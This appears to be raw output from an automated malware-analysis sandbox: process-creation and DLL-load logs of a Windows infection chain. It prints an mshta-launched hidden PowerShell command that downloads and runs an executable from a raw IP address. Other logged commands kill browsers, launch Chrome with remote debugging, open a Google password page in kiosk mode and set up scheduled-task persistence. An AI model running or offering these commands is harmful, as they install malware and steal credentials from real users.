Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe "C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe"
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Process created: C:\Windows\System32\spoolsv.exe C:\Windows\System32\spoolsv.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe "C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe"
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2280,i,2012465703375718755,8455658318380072164,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=300 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe "C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40535d6e-8e54-4867-8019-039fae6a2d7e} 2096 "\\.\pipe\gecko-crash-server-pipe.2096" 1f912d70b10 socket
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe"
Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\mtzRdqIHD.hta"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe "C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe "C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe "C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe "C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe "C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe "C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\spoolsv.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\spoolsv.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2280,i,2012465703375718755,8455658318380072164,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=300 /prefetch:3
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40535d6e-8e54-4867-8019-039fae6a2d7e} 2096 "\\.\pipe\gecko-crash-server-pipe.2096" 1f912d70b10 socket
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn GRcE4ma53OP /tr "mshta C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta" /sc minute /mo 25 /ru "user" /f
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
